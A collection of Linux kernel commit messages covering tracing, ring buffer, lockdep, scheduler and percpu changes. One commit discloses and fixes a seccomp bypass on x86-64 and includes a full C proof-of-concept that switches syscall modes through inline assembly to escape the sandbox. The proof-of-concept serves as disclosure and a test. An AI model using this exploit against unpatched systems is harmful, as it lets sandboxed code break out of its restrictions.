Impact: add reserved allocation functionality and use it for module
percpu variables
This patch implements reserved allocation from the first chunk. When
setting up the first chunk, arch can ask to set aside certain number
of bytes right after the core static area which is available only
through a separate reserved allocator. This will be used primarily
for module static percpu variables on architectures with limited
relocation range to ensure that the module perpcu symbols are inside
the relocatable range.
If reserved area is requested, the first chunk becomes reserved and
isn't available for regular allocation. If the first chunk also
includes piggy-back dynamic allocation area, a separate chunk mapping
the same region is created to serve dynamic allocation. The first one
is called static first chunk and the second dynamic first chunk.
Although they share the page map, their different area map
initializations guarantee they serve disjoint areas according to their
purposes.
If arch doesn't setup reserved area, reserved allocation is handled
like any other allocation.
Signed-off-by: Tejun Heo <tj@kernel.org>
Impact: allow user apps to read binary format of basic ftrace entries
Currently, only defined raw events export their formats so a binary
reader can parse them. There's no reason that the default ftrace entries
can't export their formats.
This patch adds a subsystem called "ftrace" in the events directory
that includes the ftrace entries for basic ftrace recorded items.
These only have three files in the events directory:
type : printf
available_types : printf
format : format for the event entry
For example:
# cat /debug/tracing/events/ftrace/wakeup/format
name: wakeup
ID: 3
format:
field:unsigned char type; offset:0; size:1;
field:unsigned char flags; offset:1; size:1;
field:unsigned char preempt_count; offset:2; size:1;
field:int pid; offset:4; size:4;
field:int tgid; offset:8; size:4;
field:unsigned int prev_pid; offset:12; size:4;
field:unsigned char prev_prio; offset:16; size:1;
field:unsigned char prev_state; offset:17; size:1;
field:unsigned int next_pid; offset:20; size:4;
field:unsigned char next_prio; offset:24; size:1;
field:unsigned char next_state; offset:25; size:1;
field:unsigned int next_cpu; offset:28; size:4;
print fmt: "%u:%u:%u ==+ %u:%u:%u [%03u]"
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: clean up
Move the macro that creates the event format file to a separate header.
This will allow the default ftrace events to use this same macro
to create the formats to read those events.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: cleanup
All file_operations structures should be constant. No one is going to
change them.
Reported-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Clean up menu structure, introduce TRACING_SUPPORT switch that signals
whether an architecture supports various instrumentation mechanisms.
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: fix function graph trace hang / drop pointless softirq on UP
While debugging a function graph trace hang on an old PII, I saw
that it consumed most of its time on the timer interrupt. And
the domain rebalancing softirq was the most concerned.
The timer interrupt calls trigger_load_balance() which will
decide if it is worth to schedule a rebalancing softirq.
In case of builtin UP kernel, no problem arises because there is
no domain question.
In case of builtin SMP kernel running on an SMP box, still no
problem, the softirq will be raised each time we reach the
next_balance time.
In case of builtin SMP kernel running on a UP box (most distros
provide default SMP kernels, whatever the box you have), then
the CPU is attached to the NULL sched domain. So a kind of
unexpected behaviour happen:
trigger_load_balance() -> raises the rebalancing softirq later
on softirq: run_rebalance_domains() -> rebalance_domains() where
the for_each_domain(cpu, sd) is not taken because of the NULL
domain we are attached at. Which means rq->next_balance is never
updated. So on the next timer tick, we will enter
trigger_load_balance() which will always reschedule() the
rebalacing softirq:
if (time_after_eq(jiffies, rq->next_balance))
raise_softirq(SCHED_SOFTIRQ);
So for each tick, we process this pointless softirq.
This patch fixes it by checking if we are attached to the null
domain before raising the softirq, another possible fix would be
to set the maximal possible JIFFIES value to rq->next_balance if
we are attached to the NULL domain.
v2: build fix on UP
Signed-off-by: Frederic Weisbecker <fweisbec@gmail.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <49af242d.1c07d00a.32d5.ffffc019@mx.google.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: decrease hangs risks with the graph tracer on slow systems
Since the function graph tracer can spend too much time on timer
interrupts, it's better now to use the more lightweight local
clock. Anyway, the function graph traces are more reliable on a
per cpu trace.
Signed-off-by: Frederic Weisbecker <fweisbec@gmail.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <49af243d.06e9300a.53ad.ffff840c@mx.google.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
The atomic debug modifiers are already defined in
kernel/lockdep_internals.h.
Signed-off-by: David Rientjes <rientjes@google.com>
Acked-by: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <alpine.DEB.2.00.0903050222160.30401@chino.kir.corp.google.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: cleanup
Use a more generic name - this also allows the prototype to move
to kernel.h and be generally available to kernel developers who
want to do some quick tracing.
Signed-off-by: Ingo Molnar <mingo@elte.hu>
The latency tracers (irqsoff, preemptoff, preemptirqsoff, and wakeup)
are pretty useless with the default output format. This patch makes them
automatically enable the latency format when they are selected. They
also record the state of the latency option, and if it was not enabled
when selected, they disable it on reset.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: clean up
Both print_lat_fmt and print_trace_fmt do pretty much the same thing
except for one different function call. This patch consolidates the
two functions and adds an if statement to perform the difference.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: clean up
The trace and latency_trace function pointers are identical for
every tracer but the function tracer. The differences in the function
tracer are trivial (latency output puts paranthesis around parent).
This patch removes the latency_trace pointer and all prints will
now just use the trace output function pointer.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
With the removal of the latency_trace file, we lost the ability
to see some of the finer details in a trace. Like the state of
interrupts enabled, the preempt count, need resched, and if we
are in an interrupt handler, softirq handler or not.
This patch simply creates an option to bring back the old format.
This also removes the warning about an unused variable that held
the latency_trace file operations.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
The buffer used by trace_seq was updated incorrectly. Instead
of consuming what was actually read, it consumed the rest of the
buffer on reads.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: fix trace read to conform to standards
Andrew Morton, Theodore Tso and H. Peter Anvin brought to my attention
that a userspace read should not return -EFAULT if it succeeded in
copying anything. It should only return -EFAULT if it failed to copy
at all.
This patch modifies the check of copy_from_user and updates the return
code appropriately.
I also used H. Peter Anvin's short cut rule to just test ret == count.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
If a partial ring_buffer_page_read happens, then some of the
incremental timestamps may be lost. This patch writes the
recent timestamp into the page that is passed back to the caller.
A partial ring_buffer_page_read is where the full page would not
be written back to the user, and instead, just part of the page
is copied to the user. A full page would be a page swap with the
ring buffer and the timestamps would be correct.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: fix to ftrace_dump output corruption
The commit: b04cc6b1f6
tracing/core: introduce per cpu tracing files
added a new field to the iterator called cpu_file. This was a handle
to differentiate between the per cpu trace output files and the
all cpu "trace" file. The all cpu "trace" file required setting this
to TRACE_PIPE_ALL_CPU.
The problem is that the ftrace_dump sets up its own iterator but was
not updated to handle this change. The result was only CPU 0 printing
out on crash and a lot of "<0>"'s also being printed.
Reported-by: Thomas Gleixner <tglx@linuxtronix.de>
Tested-by: Darren Hart <dvhtc@us.ibm.com>
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
If a machine is flooded by network frames, a cpu can loop
100% of its time inside ksoftirqd() without calling schedule().
This can delay RCU grace period to insane values.
Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem.
Paul: "This regression was a result of the recent change from
"schedule()" to "cond_resched()", which got rid of that quiescent
state in the common case where a reschedule is not needed".
Signed-off-by: Eric Dumazet <dada1@cosmosbay.com>
Reviewed-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: clarify lockdep printk text
print_irq_inversion_bug() gets handed state strings of the form
"HARDIRQ", "SOFTIRQ", "RECLAIM_FS"
and appends "-irq-{un,}safe" to them, which is either redudant for *IRQ or
confusing in the RECLAIM_FS case.
Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
LKML-Reference: <1236175192.5330.7585.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
In the recent mark_lock_irq() rework a bug snuck in that would report the
state of write locks causing irq inversion under a read lock as a read
lock.
Fix this by masking the read bit of the state when validating write
dependencies.
Reported-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
LKML-Reference: <1236172646.5330.7450.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
Impact: new feature
This patch creates a directory of files that correspond to the
per CPU ring buffers. These are binary files and are made to
be used with splice. This is the fastest way to extract data from
the ftrace ring buffers.
Thanks to Jiaying Zhang for pushing me to get this code fixed,
and to Eduard - Gabriel Munteanu for his splice code that helped
me debug my code.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: dont leave holes in read buffer page
The ring_buffer_read_page swaps a given page with the reader page
of the ring buffer, if certain conditions are set:
1) requested length is big enough to hold entire page data
2) a writer is not currently on the page
3) the page is not partially consumed.
Instead of swapping with the supplied page. It copies the data to
the supplied page instead. But currently the data is copied in the
same offset as the source page. This causes a hole at the start
of the reader page. This complicates the use of this function.
Instead, it should copy the data at the beginning of the function
and update the index fields accordingly.
Other small clean ups are also done in this patch.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: fix to possible alignment problems on some archs.
Some arch compilers include an NULL char array in the sizeof field.
Since the ring_buffer_event type includes one of these, it is better
to use the "offsetof" instead, to avoid strange bugs on these archs.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
The ring_buffer_read_page was broken if it were to only copy part
of the page. This patch fixes that up as well as adds a parameter
to allow a length field, in order to only copy part of the buffer page.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: fix ring_buffer_read_page
After a page is swapped into the ring buffer, the write field must
also be reset.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
* 'sched-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
sched: don't allow setuid to succeed if the user does not have rt bandwidth
sched_rt: don't start timer when rt bandwidth disabled
* 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
rcu: Teach RCU that idle task is not quiscent state at boot
The registering of events had the return value check backwards.
A zero returned is success, the check had it as a failure.
This patch also fixes a missing "\n" in the warning that the check
failed.
Reported-by: Ingo Molnar <mingo@elte.hu>
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Make sure the genirq layer handlers are indeed running handlers
in hardirq context. That is the genirq expectation and doing
anything else is broken.
Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Andrew Morton <akpm@linux-foundation.org>
LKML-Reference: <1236006812.5330.632.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
To be able to identify the trace in the binary format output, the
id of the trace event (which is dynamically assigned) must also be listed.
This patch adds the name of the trace point as well as the id assigned.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
This patch includes the ftrace header to the event formats files:
# cat /debug/tracing/events/sched/sched_switch/format
field:unsigned char type; offset:0; size:1;
field:unsigned char flags; offset:1; size:1;
field:unsigned char preempt_count; offset:2; size:1;
field:int pid; offset:4; size:4;
field:int tgid; offset:8; size:4;
field:pid_t prev_pid; offset:12; size:4;
field:int prev_prio; offset:16; size:4;
field special:char next_comm[TASK_COMM_LEN]; offset:20; size:16;
field:pid_t next_pid; offset:36; size:4;
field:int next_prio; offset:40; size:4;
A blank line is used as a deliminator between the ftrace header and the
trace point fields.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
This patch adds the "format" file to the trace point event directory.
This is based off of work by Tom Zanussi, in which a file is exported
to be tread from user land such that a user space app may read the
binary record stored in the ring buffer.
# cat /debug/tracing/events/sched/sched_switch/format
field:pid_t prev_pid; offset:12; size:4;
field:int prev_prio; offset:16; size:4;
field special:char next_comm[TASK_COMM_LEN]; offset:20; size:16;
field:pid_t next_pid; offset:36; size:4;
field:int next_prio; offset:40; size:4;
Idea-from: Tom Zanussi <tzanussi@gmail.com>
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
Impact: clean up
The trace_seq functions may be used separately outside of the ftrace
iterator. The trace_seq_reset is needed for these operations.
This patch also renames trace_seq_reset to the more appropriate
trace_seq_init.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>
The trace event objects are currently not proctected against
reentrancy. This patch adds a mutex around the modifications of
the trace event fields.
Signed-off-by: Steven Rostedt <srostedt@redhat.com>